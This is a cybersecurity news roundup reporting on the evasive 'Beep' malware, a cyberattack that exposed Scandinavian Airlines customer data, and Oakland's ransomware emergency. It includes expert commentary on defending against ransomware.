At a glance.
- New malware is “beeping” good at evading detection.
- Scandinavian Airlines cyberattack leads to customer data leak.
- Oakland update.
New malware is “beeping” good at evading detection.
A newly discovered malware dubbed “Beep” is getting attention for its advanced detection evasion methods. Minerva Labs researcher Natalie Zargarov explains, "It seemed as if the authors of this malware were trying to implement as many anti-debugging and anti-VM (anti-sandbox) techniques as they could find. One such technique involved delaying execution through the use of the Beep API function, hence the malware's name." As the Hacker News reports, the malware uses a dropper to create a new Windows Registry key and execute a Base64-encoded PowerShell script. That script communicates with a remote server to retrieve an injector that launches the payload, an information stealer designed to download system information and enumerate running processes.
The malware uses numerous tactics to resist analysis, avoid sandboxes, and delay execution. "The malware tries to hide itself by dropping many unused, invalid files and stores important data between several MB of unimportant data, and also utilizes legitimate applications to perform its execution," the researchers explain. Beep is delivered via spam email attachments, Discord, or OneDrive URLs, and is likely being offered as a service to cybercriminals seeking a way to distribute their own payloads. Researchers found a number of features within the malware that have not yet been implemented, indicating that Beep will likely be further developed in the future.
Scandinavian Airlines cyberattack leads to customer data leak.
Scandinavian Airlines (SAS) on Tuesday disclosed it suffered a cyberattack that shut down the company’s website for several hours and resulted in the inadvertent exposure of customer data. The Copenhagen Post reports that a number of SAS app users took to social media to let SAS know they suddenly had access to data from other customers’ app accounts. The airline, which is the flag carrier of Denmark, Norway, and Sweden, notified customers on Tuesday evening that the site was experiencing issues and urged them not to use the app. A few hours later SAS announced it had resolved the issues. Karin Nyman, head of press at SAS, was hesitant to share further details. “We aren’t able to say a lot more right now as we are right in the attack right now,” she stated. Skift notes that several other Swedish companies experienced cyberattacks on Tuesday, including TV station Sveriges Television, which was hit by hacker group Anonymous Sudan in protest of Danish-Swedish, far-right politician Rasmus Paludan’s recent burning of Qurans.
Update on Oakland's ransomware incident.
The city of Oakland, California, has declared a state of emergency over its own ransomware attack. The city announced, Wednesday, that “Interim City Administrator, G. Harold Duffey issued a local state of emergency due to the ongoing impacts of the network outages resulting from the ransomware attack that began on Wednesday, February 8. Oakland continues to experience a network outage that has left several non-emergency systems including phone lines within the City of Oakland impacted or offline.” The city appeals for patience and cooperation, and says it’s taking steps to get the help it needs to recover.
Erfan Shadabi, cybersecurity expert with comforte AG, commented on the increasing likelihood of ransomware attacks on governments. “The ransomware incident affecting City of Oakland underscores a harsh reality that every governmental agency must confront: a ransomware attack isn’t just a remote possibility but rather a likely imminent event. The major objectives of the threat actors behind these attacks are to be able to halt operations, encrypt crucial operational data, and generally cause havoc in the provision of governmental services." He offered some advise for agencies as they prepare for this eventuality. "A better course of action other than relying on paying a ransom is to prepare for this eventuality with the following steps:
- "Back up your data regularly: Make sure you have a backup of all your important data and files on a separate device or cloud storage. Regularly backing up your data can help you recover quickly in case of a ransomware attack.
- "Train your employees on ransomware prevention: Educate your employees on how to identify and prevent ransomware attacks. This can include warning them about suspicious emails, not clicking on unknown links, and not downloading or installing unauthorized software.
- "And make sure to use data-centric security methods such as tokenization and format-preserving encryption protect the data itself rather than the environment around it. Even if hackers get their hands on data, they can’t blackmail organizations with the threat of imminent release of that data. And that’s what ransomware is all about—blackmail. Don’t let that happen to your organization. Accept the eventuality and prepare accordingly.”
Chris Clements, VP of solutions architecture at Cerberus Sentinel, notes the challenges that municipal governments in particular face with respect to ransomware:
“Municipalities, even larger ones, often struggle to defend themselves from cybercriminals. Government in general tends to be slower to respond to a rapidly evolving threat landscape, and often lacks the budget, tools, and talent to mount a credible cybersecurity defense, making them easy targets for cybercriminals. Combined with their ability to pay large ransom demands, this makes municipalities favorite targets for cybercriminals.
"To remain safe against modern threat actors, municipalities must adopt a true culture of cybersecurity that goes beyond simply buying the latest cybersecurity product that promises to be a silver bullet. An effective cybersecurity culture must start from first principles and account for all aspects, including proactive system and application hardening, attack surface minimization, continuous monitoring that could indicate the presence of an attacker, and regular vulnerability scanning and penetration testing to validate that no gaps or mistakes have been made that expose the organization to risk. Education is also a key component of cybersecurity programs. Statistics indicate that the overwhelming majority of cybersecurity incidents stem from social engineering attacks like phishing, and while achieving and maintaining 100% personnel resilience is never possible, training can make a meaningful difference in preventing successful attacks.”
Dror Liwer, co-founder of Coro, draws attention to the preeminent attack vector. “The majority of ransomware attacks start with an email. All it takes is one untrained or distracted employee to click on a link or open an attachment which is why priority must be placed on implementing modern cybersecurity solutions, and conduct frequent training and simulations with the staff.”
(Added, 7:00 PM ET, February 16th, 2023. Sean McNee, VP of Research at DomainTools, deplores the criminals' target selection. Whatever they are, they aren't Robin Hoods. “It is extremely frustrating to see bad actors targeting infrastructure critical to people’s lives, such as hospitals, higher education, and, in this case, local government," McNee said. "These institutions exist for the betterment of the people, so when they are interrupted people suffer. Getting operations back up and running quickly becomes top priority, and could unfortunately mean having to pay the ransomware authors. This tension is why local governments are attractive to bad actors. Paying the ransom and/or recovering from the attack diverts critical resources from government budgets which should be used to improve their constituents’ lives.”)
(Added, 12:00 noon ET, February 17th, 2023. James Graham, VP, RiskLens, sees the incident as affording a case study in the consequences of increased interconnectivity. “This attack is a prime example of how the interconnectivity of systems and networks throughout cities significantly increases the risk to which they are exposed. Any downtime to emergency or essential services due to a cyber attack is surely dire not only to finances and reputation, but also to human life," Graham wrote. And the episode shows that ransomware is no longer just about data availability. "Ransomware is no longer limited to an IT event; it affects entire organizations, sectors and stakeholders. As such, all businesses must understand the cost-benefit ratio of the probable impacts of these attacks, from business interruption to “pay vs. not-pay” on ransomware – well in advance of an attack. That requires a systematic, quantitative risk analysis in financial terms, based on solid data and rigorous, defensible modeling. With a quantified view of cyber risk in mind, public-sector organizations can not only better prioritize what protections to implement, but also understand how their level of cyber risk might be affected by those decisions.”)